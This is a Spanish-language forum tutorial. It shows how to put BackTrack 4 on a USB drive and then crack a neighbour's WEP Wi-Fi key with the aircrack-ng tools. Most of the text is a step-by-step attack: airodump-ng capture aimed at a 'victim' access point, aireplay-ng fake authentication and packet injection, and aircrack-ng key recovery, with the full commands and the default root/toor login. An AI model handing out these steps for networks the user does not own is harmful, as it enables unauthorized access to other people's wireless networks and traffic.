kukalon2000

1. Primero formatea el pendrive a FAT32. Windows por defecto formatea en NTFS pa

ra dispositivos superiorres a 30 GB pero no es ningun problema,
si teneis este caso puedes dormatearlo desde línea de comandos/ MS-DOS con el sig
uiente comando: d: /fs:fat32 (d: suponiendo que es la letra d la del usb)
2. Ahora descarga el Unetbootin. Es una clase de asistente para instalar ISOs en
dispositivos USB.
3. En el Unetbootin elige la opción de Imagen de ISO y busca la ISO del Backtrack
4 (No poner nada en la Opción Editar Núcleo.)
4. En el tipo, por defecto está en USB y seleccionas la unidad USB dónde quieres ins
talar la ISO de Backtrack 4.
5. Y por último, az click en el boton Aceptar, y éspera a que termine.
Ahora reinicia el ordenador y al arrancar activa en la BIOS que arranque desde U
SB y a comprobar la seguridad de nuestros clientes.

Login : root
Pass : toor
Luego cuando pida comando escriben startx
3 Una vez dentro buscamos en el "inicio" una aplicacion llamada konsole .

4 Escribe ifconfig luego buscas tu interfaz de red que puede llamarse wlan0 , ra
usb , eth0 etc ... y buscas adonde dice hardware adress : anotas ese numero . oj
o .. el numero llega hasta los 00 del final ...esa es tu direccion mac. luego ci
erras esa ventana .
5 Abrimos otra konsole y escribimos : airodump-ng wlan0(tu interfaz de red)
y selecionas la red a atacar. de ella copias el mac, bssid y el canal . cierras
la ventana .
6 Abrimos otra konsole y escribimos : airodump-ng -c 6(canal de la victima) -w p
rueba(Nombre que le quieras dar al archivo de las capturas) --bssid 66:77:88:99:
00:11(mac de la victima) wlan0(tu interfaz de red) , con esto solo te aparecera
el AP de tu victima , fijate en donde dice DATA ... esa cifra tiene que llegar a
15.000 o mas para comenzar a decriptar la clave .
7 Para acelerar este proceso ya ke es muy lento o simplemente no manda DATA nece
sitamos abrir otra konsole dejando la anterior abierta . y ahi escribimos : aire
play-ng -1 0 -a 66:77:88:99:00:11(mac del victima) -h 00:11:22:33:44:55(mac tuya
) -e ejemplo(bssid de la red ke atacamos osea el nombre) wlan0(tu interfaz de re
d)
8 en este momento deberias empezar a recibir DATA mas rapido .. pero en algunos
casos demora mas poque no hay trafico de red ... luego se este paso podemos acel
erar aun mas el proceso inyectandole trafico a el router con el siguente comando
:
aireplay-ng -3 -b 66:77:88:99:00:11(mac victima) -h 00:11:22:33:44:55( tu mac) w
lan0(tu interfaz de red)
con eso deberia ir muy rapido recibiendo data ... luego cuando tengas sobre 15.0
00 no cierres la konsole y abre otra .
9 Escribes aircrack-ng prueba(el nombre k le pusiste al archivo de capturas)-01.
cap
Nota : si comienzan a salir numeros circulando rapido kere decir ke no te alcanz
an los data capturados y debes esperar mas . vas intentando hasta ke salga key f
ound : 00:00:00:00:00 esa es la clave de tu red inalambrica la copias sin los 2p
untos solo los numeros y la ingresas .

Bueno eso fue como sacar claves wep sin tanto rodeo ni cosas extrañas. pero repito
hay routers que tienen mas protecion o ke mandan DATA mas lento y solo es cosa
de esperar .. ahh y lo ultimo no funciona con routers con encryptacion TKIP o WP
A2 ke a mi juicio son las mas seguras del mundo